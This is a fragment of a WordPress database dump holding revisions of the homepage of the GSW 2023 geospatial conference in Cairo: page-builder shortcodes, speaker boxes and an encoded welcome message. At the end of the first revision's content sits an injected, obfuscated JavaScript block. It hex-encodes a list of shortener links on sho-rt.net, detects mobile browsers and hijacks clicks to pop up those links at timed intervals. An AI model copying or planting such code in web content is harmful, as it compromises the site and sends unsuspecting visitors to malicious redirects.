icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-19 16:23:07','2022-10-19 16:23:07','',2167,'https://gsw2023.com/?p=2907',0,'revision','',0),
(2908,1,'2022-10-19 16:23:52','2022-10-19 16:23:52','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQu